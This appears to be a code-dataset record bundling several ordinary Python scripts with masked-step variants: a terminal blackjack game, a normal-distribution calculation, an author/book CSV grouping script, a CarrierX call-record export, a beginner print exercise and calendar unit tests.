-- {p.name} wins ${p.bet}!');\r\n else : print();\r\n print();\r\n \r\ndef do_decision(player, dealer, hand_index=0) :\r\n choices_dict = {'s':stand, 'h':hit, 'p':split, 'd':double_down};\r\n valid_choice = False;\r\n while not valid_choice :\r\n choice = input(f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): ');\r\n while choice.lower() not in choices_dict.keys() :\r\n choice = input('Please enter either \\'s\\', \\'h\\', \\'p\\', or \\'d\\', corresponding to your choice: ');\r\n valid_choice = choices_dict.get(choice)(player, dealer, hand_index);\r\n \r\ndef cycle_decisions(players) :\r\n dealer = players[-1];\r\n for p in players :\r\n if isinstance(p, people.Dealer) :\r\n print(f'{p.name} will hit until reaching a hand of at least \\'hard\\' 17 (without an ace counting for 11).');\r\n sys.stdout.flush();\r\n time.sleep(0.8);\r\n if not check_status(p) and not p.check_hard_17() : hit(p, dealer);\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n disp_str_slow('\\nEnd-of-Round Earnings: \\n', 0.05);\r\n if p.check_bust() :\r\n for i in players[:-1] :\r\n if not i.check_broke() :\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n print(' ', end='');\r\n for j in range(0,len(i.hand)) : # this is to loop through each hand for a player (player would have multiple hands after splitting)\r\n if not i.check_bust(j) :\r\n print(f'{i.name} wins ${i.bet}! ', end='');\r\n i.money += i.bet;\r\n else :\r\n print(f'{i.name} loses ${i.bet}! 
', end='');\r\n i.money -= i.bet;\r\n i.chips = chip.convert_to_chips(i.money);\r\n if i.check_broke() :\r\n print(f'Sorry {i.name}, but you\\'re out of money and can no longer play in this game');\r\n else :\r\n print(f'Current Balance: ${i.money} (Chips: {i.chips})');\r\n else :\r\n for i in players[:-1] :\r\n if not i.check_broke() :\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n print(' ', end='');\r\n for j in range(0,len(i.hand)) :\r\n if not i.check_bust(j) :\r\n if i.hand_value(j) > p.hand_value() :\r\n print(f'{i.name} wins ${i.bet}! ', end='');\r\n i.money += i.bet;\r\n elif i.hand_value(j) < p.hand_value() :\r\n print(f'{i.name} loses ${i.bet}! ', end='');\r\n i.money -= i.bet;\r\n else :\r\n print(f'{i.name} tied with the {p.name}! No change. ', end='');\r\n else :\r\n print(f'{i.name} loses ${i.bet}! ', end='');\r\n i.money -= i.bet;\r\n i.chips = chip.convert_to_chips(i.money);\r\n if i.check_broke() :\r\n print(f'Sorry {i.name}, but you\\'re out of money and can no longer play in this game');\r\n else :\r\n print(f'Current Balance: ${i.money} (Chips: {i.chips})');\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n else :\r\n if not p.check_blackjack() and not p.check_broke() :\r\n do_decision(p, dealer);\r\n \r\ndef stand(player, dealer, hand_index=0) :\r\n print(f'{player.name} stands.\\n');\r\n return True;\r\n \r\ndef hit(player, dealer, hand_index=0) :\r\n dealer.deal_card(player, hand_index);\r\n done = check_status(player, hand_index);\r\n if isinstance(player, people.Dealer) :\r\n while not player.check_hard_17() and not done:\r\n time.sleep(0.5);\r\n dealer.deal_card(player, hand_index);\r\n done = check_status(player, hand_index);\r\n else :\r\n \r\n choice = '';\r\n if not done :\r\n choice = input('Do you want to hit again (\\'y\\' or \\'n\\')? 
').lower();\r\n while choice != 'y' and choice != 'n' :\r\n choice = input('Enter either \\'y\\' or \\'n\\': ');\r\n while choice == 'y' and not done:\r\n dealer.deal_card(player, hand_index);\r\n done = check_status(player, hand_index);\r\n if not done :\r\n choice = input('Do you want to hit again (\\'y\\' or \\'n\\')? ').lower();\r\n while choice != 'y' and choice != 'n' :\r\n choice = input('Enter either \\'y\\' or \\'n\\': ');\r\n if not done : print();\r\n return True;\r\n \r\ndef split(player, dealer, hand_index=0) :\r\n if player.hand[hand_index][0] != player.hand[hand_index][1] :\r\n print('You can\\'t split on that hand! You need two identical cards to split. Choose again.');\r\n return False;\r\n elif player.bet*2 > player.money :\r\n print(f'You don\\'t have enough money to split with your current bet (${player.bet} * 2 = ${player.bet*2})! Choose again.');\r\n return False;\r\n hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]];\r\n player.hand = hands;\r\n print('Now you will play each hand separately: \\n');\r\n for i in range(0,2) :\r\n print(f'For Hand #{i+1}: ');\r\n do_decision(player, dealer, i); \r\n return True;\r\n \r\n \r\ndef double_down(player, dealer, hand_index=0) :\r\n if player.bet*2 > player.money :\r\n print(f'You don\\'t have enough money to do that (${player.bet} * 2 = ${player.bet*2})! Choose again.');\r\n return False;\r\n elif player.did_double_down :\r\n print('You can double down only once! 
Choose a different option.');\r\n return False;\r\n player.bet *= 2;\r\n player.did_double_down = True;\r\n print(f'Bet increased to ${player.bet}!.');\r\n do_decision(player, dealer, hand_index);\r\n return True;\r\n \r\ndef check_status(player, hand_index=0) :\r\n done = False;\r\n hand_string = '[';\r\n for card in player.hand[hand_index][:-1] :\r\n hand_string += card.__str__() + ', ';\r\n print(f'Current Hand: {hand_string}', end='');\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05);\r\n time.sleep(0.5);\r\n if player.check_blackjack(hand_index) :\r\n disp_str_slow(' ==> BLACKJACK!!! ', 0.05);\r\n if not isinstance(player, people.Dealer) : \r\n disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05);\r\n print('\\n\\n', end='');\r\n done = True;\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n elif player.check_bust(hand_index) :\r\n disp_str_slow(' ==> BUST! ', 0.05);\r\n if not isinstance(player, people.Dealer) : \r\n disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05);\r\n print('\\n\\n', end='');\r\n done = True;\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n else :\r\n print();\r\n return done;\r\n \r\ndef play_again(players) :\r\n print();\r\n all_broke = True;\r\n for i in players :\r\n if not i.check_broke() : all_broke = False;\r\n if not all_broke :\r\n choice = input('Do you all want to play another round? 
Enter \\'y\\' or \\'n\\': ').lower();\r\n while choice != 'y' and choice != 'n' :\r\n choice = input('Enter either \\'y\\' or \\'n\\': ');\r\n print();\r\n return choice;\r\n else :\r\n print();\r\n return 'n';\r\n \r\ndef reset(players) :\r\n dealer = players[-1];\r\n for player in players : \r\n dealer.retrieve_cards(player);\r\n player.bet = 0;\r\n \r\ndef display_accounts(players) :\r\n for player in players[:-1] :\r\n change = player.money - player.initial_money;\r\n word = 'gain';\r\n if change < 0 : \r\n word = 'loss';\r\n print(f' {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\\n');\r\n sys.stdout.flush();\r\n time.sleep(0.5);\r\n \r\ndef disp_str_slow(phrase, t) :\r\n for i in phrase :\r\n print(i, end='');\r\n sys.stdout.flush();\r\n time.sleep(t);\r\n\r\ndef print_players(players) :\r\n for player in players :\r\n print(player);\r\n\r\ndef main() :\r\n display_instructions();\r\n num_players = get_num_players();\r\n players = create_players(num_players);\r\n dealer = people.Dealer(Deck(6));\r\n players.append(dealer);\r\n \r\n replay_choice = 'y';\r\n while replay_choice == 'y' :\r\n reset(players);\r\n place_bets(players);\r\n for i in range(0,2) :\r\n deal(dealer, players);\r\n view_hands(players); \r\n cycle_decisions(players);\r\n replay_choice = play_again(players); \r\n \r\n print('------------------------------------------------------------------------------------------------\\n');\r\n disp_str_slow('FINAL PLAYER ACCOUNTS\\n\\n', 0.05);\r\n sys.stdout.flush();\r\n time.sleep(0.5)\r\n display_accounts(players);\r\n sys.stdout.flush(); \r\n time.sleep(0.2)\r\n print('------------------------------------------------------------------------------------------------\\n');\r\n print('Goodbye!');\r\n \r\nif __name__ == '__main__' :\r\n main();",
"step-ids": [
7,
19,
20,
21,
22
]
}
|
[
7,
19,
20,
21,
22
] |
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 21 15:09:26 2017
@author: Jieun
"""
from scipy.stats import invgauss
from scipy.stats import norm
# rv = invgauss.ppf(0.95,mu)
# a = 8/(2*rv)
# print a
# norm.ppf uses mean = 0 and stddev = 1, which is the "standard" normal distribution
# can use a different mean and standard deivation by specifiying the loc and scale arguments
# norm.ppf(0.95, loc = 10, scale = 2)
#n = norm.ppf(0.95)
#n1 = norm.ppf(0.95)
#print n + n1
#check = norm.cdf(norm.ppf(0.95))
#print check
#print ''
# rv = invgauss.cdf(0.95, 8)
# rv1 = invgauss.cdf(0.95, 8)
# print rv
# print rv1
# print rv + rv1
# print 8/2.4
# print ''
# For inverse cdf
# 1 - alpha = 0.981
# detection probability is not given...
## measured values
# For Design A
inverse_1_alpha = norm.ppf(1-0.050)
inverse_1_beta = norm.ppf(0.90)
sum = inverse_1_alpha + inverse_1_beta
sigma = 8/sum
print sigma
print ''
print ''
# sq = 8
# sigma = sq/sum
# print sigma
# print ''
#print check
#cal= 1- check
# For Design B
#inverse_1_alpha_Design_B = norm.ppf(0.981)
#inverse_1_beta_Design_B = - inverse_1_alpha_Design_B + 0.940/1.189
#check2 = norm.cdf(inverse_1_beta_Design_B)
#print check2
#cal1 = 1- check2
# print cal
#print cal1
## inspection values
# inverse_1_alpha_expected = norm.ppf(0.981)
# inverse_1_beta_expected = inverse_1_alpha_expected - 0.90358/0.76235
# check3 = norm.cdf(inverse_1_beta_expected)
# `print check3
|
normal
|
{
"blob_id": "c9e0586942430fcd5b81c5716a06a4eef2c2f203",
"index": 3178,
"step-1": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 21 15:09:26 2017\n\n@author: Jieun\n\"\"\"\n\nfrom scipy.stats import invgauss\nfrom scipy.stats import norm\n\n# rv = invgauss.ppf(0.95,mu) \n# a = 8/(2*rv)\n# print a\n# norm.ppf uses mean = 0 and stddev = 1, which is the \"standard\" normal distribution\n# can use a different mean and standard deivation by specifiying the loc and scale arguments \n# norm.ppf(0.95, loc = 10, scale = 2)\n#n = norm.ppf(0.95)\n#n1 = norm.ppf(0.95)\n#print n + n1\n#check = norm.cdf(norm.ppf(0.95))\n#print check\n#print ''\n\n# rv = invgauss.cdf(0.95, 8)\n# rv1 = invgauss.cdf(0.95, 8)\n# print rv\n# print rv1\n# print rv + rv1\n# print 8/2.4\n# print ''\n\n# For inverse cdf \n# 1 - alpha = 0.981\n# detection probability is not given...\n\n## measured values \n# For Design A\n\n\ninverse_1_alpha = norm.ppf(1-0.050)\ninverse_1_beta = norm.ppf(0.90)\nsum = inverse_1_alpha + inverse_1_beta\nsigma = 8/sum\nprint sigma\nprint ''\nprint ''\n# sq = 8\n# sigma = sq/sum\n# print sigma\n# print ''\n\n#print check\n#cal= 1- check\n\n# For Design B\n#inverse_1_alpha_Design_B = norm.ppf(0.981)\n#inverse_1_beta_Design_B = - inverse_1_alpha_Design_B + 0.940/1.189\n#check2 = norm.cdf(inverse_1_beta_Design_B)\n#print check2\n#cal1 = 1- check2 \n# print cal\n#print cal1\n## inspection values \n# inverse_1_alpha_expected = norm.ppf(0.981)\n# inverse_1_beta_expected = inverse_1_alpha_expected - 0.90358/0.76235\n# check3 = norm.cdf(inverse_1_beta_expected)\n# `print check3\n\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import pandas as pd
import os
"""
This code relies heavily on the form of the data. Namely it will fail if
the authors of the same book are not comma separated. It will also be inaccurate
or even fail if the same author for different books is not spelt in exactly the
same way.
"""
loc = r'C:\Users\james\OneDrive\Documents\University\2017-18 Southampton\Data Mining\Group Coursework\Data'
#path = os.path.join(loc, r'Sample\new_books_data.csv')
path = os.path.join(loc, r'Processed_Data\new_books_data.csv')
books_data = pd.read_csv(path)
def split(string):
"""
Function takes input of a string and returns an array of strings
the original string should be comma separated with a space after
the comma in order for this function to be accurate.
"""
names = []
index = 0
last = 0
for letter in string:
if ((letter == ',') or (index == (len(string) - 1))):
if (index == (len(string) - 1)):
names.append(string[last:(index+1)])
else:
names.append(string[last:index])
last = index+2
index += 1
return names
unique_authors = []
count = 0
for name in books_data['authors']:
if (count%1000 == 0):
print(count)
split_names = split(name)
for author in split_names:
if (author in unique_authors):
pass
else:
unique_authors.append(author)
count += 1
authors_books = []
length = len(books_data.index)
count = 0
length_2 = len(unique_authors)
for author in unique_authors:
if (count%100 == 0):
print(str(count)+'/'+str(length_2))
books = []
for i in range(length):
split_names = split(books_data['authors'][i])
if (author in split_names):
books.append(books_data['goodreads_book_id'][i])
authors_books.append(books)
count += 1
d = {'author': unique_authors, 'book_id': authors_books}
books_by_author = pd.DataFrame(data=d)
#write_path = os.path.join(loc, r'Sample\books_by_author.csv')
write_path = os.path.join(loc, r'Processed_Data\books_by_author.csv')
books_by_author.to_csv(write_path, index=False)
|
normal
|
{
"blob_id": "f57490c8f4a5ba76824c3b41eb18905eb2213c23",
"index": 5107,
"step-1": "<mask token>\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if letter == ',' or index == len(string) - 1:\n if index == len(string) - 1:\n names.append(string[last:index + 1])\n else:\n names.append(string[last:index])\n last = index + 2\n index += 1\n return names\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if letter == ',' or index == len(string) - 1:\n if index == len(string) - 1:\n names.append(string[last:index + 1])\n else:\n names.append(string[last:index])\n last = index + 2\n index += 1\n return names\n\n\n<mask token>\nfor name in books_data['authors']:\n if count % 1000 == 0:\n print(count)\n split_names = split(name)\n for author in split_names:\n if author in unique_authors:\n pass\n else:\n unique_authors.append(author)\n count += 1\n<mask token>\nfor author in unique_authors:\n if count % 100 == 0:\n print(str(count) + '/' + str(length_2))\n books = []\n for i in range(length):\n split_names = split(books_data['authors'][i])\n if author in split_names:\n books.append(books_data['goodreads_book_id'][i])\n authors_books.append(books)\n count += 1\n<mask token>\nbooks_by_author.to_csv(write_path, index=False)\n",
"step-3": "<mask token>\nloc = (\n 'C:\\\\Users\\\\james\\\\OneDrive\\\\Documents\\\\University\\\\2017-18 Southampton\\\\Data Mining\\\\Group Coursework\\\\Data'\n )\npath = os.path.join(loc, 'Processed_Data\\\\new_books_data.csv')\nbooks_data = pd.read_csv(path)\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if letter == ',' or index == len(string) - 1:\n if index == len(string) - 1:\n names.append(string[last:index + 1])\n else:\n names.append(string[last:index])\n last = index + 2\n index += 1\n return names\n\n\nunique_authors = []\ncount = 0\nfor name in books_data['authors']:\n if count % 1000 == 0:\n print(count)\n split_names = split(name)\n for author in split_names:\n if author in unique_authors:\n pass\n else:\n unique_authors.append(author)\n count += 1\nauthors_books = []\nlength = len(books_data.index)\ncount = 0\nlength_2 = len(unique_authors)\nfor author in unique_authors:\n if count % 100 == 0:\n print(str(count) + '/' + str(length_2))\n books = []\n for i in range(length):\n split_names = split(books_data['authors'][i])\n if author in split_names:\n books.append(books_data['goodreads_book_id'][i])\n authors_books.append(books)\n count += 1\nd = {'author': unique_authors, 'book_id': authors_books}\nbooks_by_author = pd.DataFrame(data=d)\nwrite_path = os.path.join(loc, 'Processed_Data\\\\books_by_author.csv')\nbooks_by_author.to_csv(write_path, index=False)\n",
"step-4": "import pandas as pd\nimport os\n<mask token>\nloc = (\n 'C:\\\\Users\\\\james\\\\OneDrive\\\\Documents\\\\University\\\\2017-18 Southampton\\\\Data Mining\\\\Group Coursework\\\\Data'\n )\npath = os.path.join(loc, 'Processed_Data\\\\new_books_data.csv')\nbooks_data = pd.read_csv(path)\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if letter == ',' or index == len(string) - 1:\n if index == len(string) - 1:\n names.append(string[last:index + 1])\n else:\n names.append(string[last:index])\n last = index + 2\n index += 1\n return names\n\n\nunique_authors = []\ncount = 0\nfor name in books_data['authors']:\n if count % 1000 == 0:\n print(count)\n split_names = split(name)\n for author in split_names:\n if author in unique_authors:\n pass\n else:\n unique_authors.append(author)\n count += 1\nauthors_books = []\nlength = len(books_data.index)\ncount = 0\nlength_2 = len(unique_authors)\nfor author in unique_authors:\n if count % 100 == 0:\n print(str(count) + '/' + str(length_2))\n books = []\n for i in range(length):\n split_names = split(books_data['authors'][i])\n if author in split_names:\n books.append(books_data['goodreads_book_id'][i])\n authors_books.append(books)\n count += 1\nd = {'author': unique_authors, 'book_id': authors_books}\nbooks_by_author = pd.DataFrame(data=d)\nwrite_path = os.path.join(loc, 'Processed_Data\\\\books_by_author.csv')\nbooks_by_author.to_csv(write_path, index=False)\n",
"step-5": "import pandas as pd\nimport os\n\n\"\"\"\nThis code relies heavily on the form of the data. Namely it will fail if \nthe authors of the same book are not comma separated. It will also be inaccurate\nor even fail if the same author for different books is not spelt in exactly the\nsame way.\n\"\"\"\n\n\nloc = r'C:\\Users\\james\\OneDrive\\Documents\\University\\2017-18 Southampton\\Data Mining\\Group Coursework\\Data'\n \n#path = os.path.join(loc, r'Sample\\new_books_data.csv')\npath = os.path.join(loc, r'Processed_Data\\new_books_data.csv')\n\nbooks_data = pd.read_csv(path)\n\n\ndef split(string):\n \"\"\"\n Function takes input of a string and returns an array of strings\n the original string should be comma separated with a space after\n the comma in order for this function to be accurate.\n \"\"\"\n names = []\n index = 0\n last = 0\n for letter in string:\n if ((letter == ',') or (index == (len(string) - 1))):\n if (index == (len(string) - 1)):\n names.append(string[last:(index+1)])\n else:\n names.append(string[last:index])\n last = index+2\n index += 1\n return names\n\n\nunique_authors = []\ncount = 0\nfor name in books_data['authors']:\n if (count%1000 == 0):\n print(count)\n split_names = split(name)\n for author in split_names:\n if (author in unique_authors):\n pass\n else:\n unique_authors.append(author)\n count += 1\n\nauthors_books = []\nlength = len(books_data.index)\n\ncount = 0\nlength_2 = len(unique_authors)\nfor author in unique_authors:\n if (count%100 == 0):\n print(str(count)+'/'+str(length_2))\n books = []\n for i in range(length):\n split_names = split(books_data['authors'][i])\n if (author in split_names):\n books.append(books_data['goodreads_book_id'][i])\n authors_books.append(books)\n count += 1\n\nd = {'author': unique_authors, 'book_id': authors_books}\nbooks_by_author = pd.DataFrame(data=d)\n\n#write_path = os.path.join(loc, r'Sample\\books_by_author.csv')\nwrite_path = os.path.join(loc, 
r'Processed_Data\\books_by_author.csv')\nbooks_by_author.to_csv(write_path, index=False)\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Ejercicio 1
print('Pepito')
print('Cumpleaños: 22 de enero')
edad = 42
print('Tengo', edad, 'años')
cantante = 'Suzanne Vega'
comida = 'rúcula'
ciudad = 'Barcelona'
print('Me gusta la música de', cantante)
print('Me gusta cenar', comida)
print('Vivo en', ciudad)
|
normal
|
{
"blob_id": "f26c624e8ae9711eb835e223407256e60dfc6d6e",
"index": 8945,
"step-1": "<mask token>\n",
"step-2": "print('Pepito')\nprint('Cumpleaños: 22 de enero')\n<mask token>\nprint('Tengo', edad, 'años')\n<mask token>\nprint('Me gusta la música de', cantante)\nprint('Me gusta cenar', comida)\nprint('Vivo en', ciudad)\n",
"step-3": "print('Pepito')\nprint('Cumpleaños: 22 de enero')\nedad = 42\nprint('Tengo', edad, 'años')\ncantante = 'Suzanne Vega'\ncomida = 'rúcula'\nciudad = 'Barcelona'\nprint('Me gusta la música de', cantante)\nprint('Me gusta cenar', comida)\nprint('Vivo en', ciudad)\n",
"step-4": "# Ejercicio 1\nprint('Pepito')\nprint('Cumpleaños: 22 de enero')\nedad = 42\nprint('Tengo', edad, 'años')\ncantante = 'Suzanne Vega'\ncomida = 'rúcula'\nciudad = 'Barcelona'\nprint('Me gusta la música de', cantante)\nprint('Me gusta cenar', comida)\nprint('Vivo en', ciudad)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests, csv, configuration
headers = {'Authorization': f'Bearer {configuration.CARRIERX_API_TOKEN}'}
url = f'{configuration.BASE_CARRIERX_API_URL}/core/v2/calls/call_drs'
date = configuration.DATE
i = 1
params = {'limit': '1', 'order': 'date_stop asc', 'filter':
f'date_stop ge {date}'}
r = requests.get(url, headers=headers, params=params)
dr_items = r.json()['items']
if len(dr_items):
with open('calls.csv', 'w', encoding='UTF8') as csv_file:
csv_writer = csv.writer(csv_file)
csv_header = ['dr_sid', 'date_start', 'number_src', 'number_dst',
'direction', 'duration', 'price']
csv_writer.writerow(csv_header)
dr_sid = dr_items[0]['dr_sid']
csv_row = [dr_items[0]['dr_sid'], dr_items[0]['date_start'],
dr_items[0]['number_src'], dr_items[0]['number_dst'], dr_items[
0]['direction'], dr_items[0]['duration'], dr_items[0]['price']]
csv_writer.writerow(csv_row)
print(f"{i}. {dr_items[0]['dr_sid']}")
while True:
params = {'limit': '100', 'order': 'date_stop asc', 'after': dr_sid
}
r = requests.get(url, headers=headers, params=params)
if len(r.json()['items']):
dr_items = r.json()['items']
for item in dr_items:
i += 1
dr_sid = dr_items[len(r.json()['items']) - 1]['dr_sid']
csv_row = [item['dr_sid'], item['date_start'], item[
'number_src'], item['number_dst'], item['direction'
], item['duration'], item['price']]
csv_writer.writerow(csv_row)
print(f"{i}. {item['dr_sid']}")
else:
print('No more new calls')
break
else:
print(f'No calls since {date}')
|
normal
|
{
"blob_id": "8262d8b5bbb156eccae021c1c9333d3cd1a6260f",
"index": 9030,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(dr_items):\n with open('calls.csv', 'w', encoding='UTF8') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_header = ['dr_sid', 'date_start', 'number_src', 'number_dst',\n 'direction', 'duration', 'price']\n csv_writer.writerow(csv_header)\n dr_sid = dr_items[0]['dr_sid']\n csv_row = [dr_items[0]['dr_sid'], dr_items[0]['date_start'],\n dr_items[0]['number_src'], dr_items[0]['number_dst'], dr_items[\n 0]['direction'], dr_items[0]['duration'], dr_items[0]['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {dr_items[0]['dr_sid']}\")\n while True:\n params = {'limit': '100', 'order': 'date_stop asc', 'after': dr_sid\n }\n r = requests.get(url, headers=headers, params=params)\n if len(r.json()['items']):\n dr_items = r.json()['items']\n for item in dr_items:\n i += 1\n dr_sid = dr_items[len(r.json()['items']) - 1]['dr_sid']\n csv_row = [item['dr_sid'], item['date_start'], item[\n 'number_src'], item['number_dst'], item['direction'\n ], item['duration'], item['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {item['dr_sid']}\")\n else:\n print('No more new calls')\n break\nelse:\n print(f'No calls since {date}')\n",
"step-3": "<mask token>\nheaders = {'Authorization': f'Bearer {configuration.CARRIERX_API_TOKEN}'}\nurl = f'{configuration.BASE_CARRIERX_API_URL}/core/v2/calls/call_drs'\ndate = configuration.DATE\ni = 1\nparams = {'limit': '1', 'order': 'date_stop asc', 'filter':\n f'date_stop ge {date}'}\nr = requests.get(url, headers=headers, params=params)\ndr_items = r.json()['items']\nif len(dr_items):\n with open('calls.csv', 'w', encoding='UTF8') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_header = ['dr_sid', 'date_start', 'number_src', 'number_dst',\n 'direction', 'duration', 'price']\n csv_writer.writerow(csv_header)\n dr_sid = dr_items[0]['dr_sid']\n csv_row = [dr_items[0]['dr_sid'], dr_items[0]['date_start'],\n dr_items[0]['number_src'], dr_items[0]['number_dst'], dr_items[\n 0]['direction'], dr_items[0]['duration'], dr_items[0]['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {dr_items[0]['dr_sid']}\")\n while True:\n params = {'limit': '100', 'order': 'date_stop asc', 'after': dr_sid\n }\n r = requests.get(url, headers=headers, params=params)\n if len(r.json()['items']):\n dr_items = r.json()['items']\n for item in dr_items:\n i += 1\n dr_sid = dr_items[len(r.json()['items']) - 1]['dr_sid']\n csv_row = [item['dr_sid'], item['date_start'], item[\n 'number_src'], item['number_dst'], item['direction'\n ], item['duration'], item['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {item['dr_sid']}\")\n else:\n print('No more new calls')\n break\nelse:\n print(f'No calls since {date}')\n",
"step-4": "import requests, csv, configuration\nheaders = {'Authorization': f'Bearer {configuration.CARRIERX_API_TOKEN}'}\nurl = f'{configuration.BASE_CARRIERX_API_URL}/core/v2/calls/call_drs'\ndate = configuration.DATE\ni = 1\nparams = {'limit': '1', 'order': 'date_stop asc', 'filter':\n f'date_stop ge {date}'}\nr = requests.get(url, headers=headers, params=params)\ndr_items = r.json()['items']\nif len(dr_items):\n with open('calls.csv', 'w', encoding='UTF8') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_header = ['dr_sid', 'date_start', 'number_src', 'number_dst',\n 'direction', 'duration', 'price']\n csv_writer.writerow(csv_header)\n dr_sid = dr_items[0]['dr_sid']\n csv_row = [dr_items[0]['dr_sid'], dr_items[0]['date_start'],\n dr_items[0]['number_src'], dr_items[0]['number_dst'], dr_items[\n 0]['direction'], dr_items[0]['duration'], dr_items[0]['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {dr_items[0]['dr_sid']}\")\n while True:\n params = {'limit': '100', 'order': 'date_stop asc', 'after': dr_sid\n }\n r = requests.get(url, headers=headers, params=params)\n if len(r.json()['items']):\n dr_items = r.json()['items']\n for item in dr_items:\n i += 1\n dr_sid = dr_items[len(r.json()['items']) - 1]['dr_sid']\n csv_row = [item['dr_sid'], item['date_start'], item[\n 'number_src'], item['number_dst'], item['direction'\n ], item['duration'], item['price']]\n csv_writer.writerow(csv_row)\n print(f\"{i}. {item['dr_sid']}\")\n else:\n print('No more new calls')\n break\nelse:\n print(f'No calls since {date}')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import unittest
from month import Month
class MonthUnitTests(unittest.TestCase):
def test_header(self):
cal = Month(5, 2012)
result = cal.header()
self.assertEqual(" May 2012", result)
def test_header_different_month(self):
cal = Month(3, 2012)
result = cal.header()
self.assertEqual(" March 2012", result)
def test_zeller(self):
cal = Month(3, 1995)
result = cal.zeller()
self.assertEqual(3, result)
def test_zeller_again(self):
cal = Month(6, 2999)
self.assertEqual(6, cal.zeller())
def test_zeller_january(self):
cal = Month(1, 2000)
self.assertEqual(6, cal.zeller())
def test_zeller_february(self):
cal = Month(2, 2000)
self.assertEqual(2, cal.zeller())
def test_number_of_days(self):
cal = Month(6, 1900)
self.assertEqual(30, cal.days_number())
def test_number_of_days_february(self):
cal = Month(2, 1995)
self.assertEqual(28, cal.days_number())
def test_number_of_days_leap_year(self):
cal = Month(2, 1996)
self.assertEqual(29, cal.days_number())
def test_number_of_days_leap_century(self):
cal = Month(2, 2000)
self.assertEqual(29, cal.days_number())
def test_number_of_days_non_leap_century(self):
cal = Month(2, 1900)
self.assertEqual(28, cal.days_number())
def test_blank_spaces(self):
cal = Month(2, 1990)
self.assertEqual([" "," "," "," "], cal.spaces())
def test_days(self):
cal = Month(2, 1990)
expected = [" 1"," 2"," 3"," 4"," 5"," 6"," 7"," 8"," 9","10","11","12","13","14","15","16","17","18","19","20","21","22","23","24","25","26","27","28"]
self.assertEqual(expected, cal.days())
def test_format_days(self):
cal = Month(2, 1990)
expected = [" "," "," "," "," 1"," 2"," 3"," 4"," 5"," 6"," 7"," 8"," 9","10","11","12","13","14","15","16","17","18","19","20","21","22","23","24","25","26","27","28"]
self.assertEqual(expected, cal.format_days())
|
normal
|
{
"blob_id": "36c1d75171d772138b820651e11a3a7bc3a6521c",
"index": 8226,
"step-1": "<mask token>\n\n\nclass MonthUnitTests(unittest.TestCase):\n\n def test_header(self):\n cal = Month(5, 2012)\n result = cal.header()\n self.assertEqual(' May 2012', result)\n\n def test_header_different_month(self):\n cal = Month(3, 2012)\n result = cal.header()\n self.assertEqual(' March 2012', result)\n\n def test_zeller(self):\n cal = Month(3, 1995)\n result = cal.zeller()\n self.assertEqual(3, result)\n <mask token>\n\n def test_zeller_january(self):\n cal = Month(1, 2000)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_february(self):\n cal = Month(2, 2000)\n self.assertEqual(2, cal.zeller())\n\n def test_number_of_days(self):\n cal = Month(6, 1900)\n self.assertEqual(30, cal.days_number())\n\n def test_number_of_days_february(self):\n cal = Month(2, 1995)\n self.assertEqual(28, cal.days_number())\n\n def test_number_of_days_leap_year(self):\n cal = Month(2, 1996)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_leap_century(self):\n cal = Month(2, 2000)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_non_leap_century(self):\n cal = Month(2, 1900)\n self.assertEqual(28, cal.days_number())\n\n def test_blank_spaces(self):\n cal = Month(2, 1990)\n self.assertEqual([' ', ' ', ' ', ' '], cal.spaces())\n\n def test_days(self):\n cal = Month(2, 1990)\n expected = [' 1', ' 2', ' 3', ' 4', ' 5', ' 6', ' 7', ' 8', ' 9',\n '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25', '26', '27', '28']\n self.assertEqual(expected, cal.days())\n <mask token>\n",
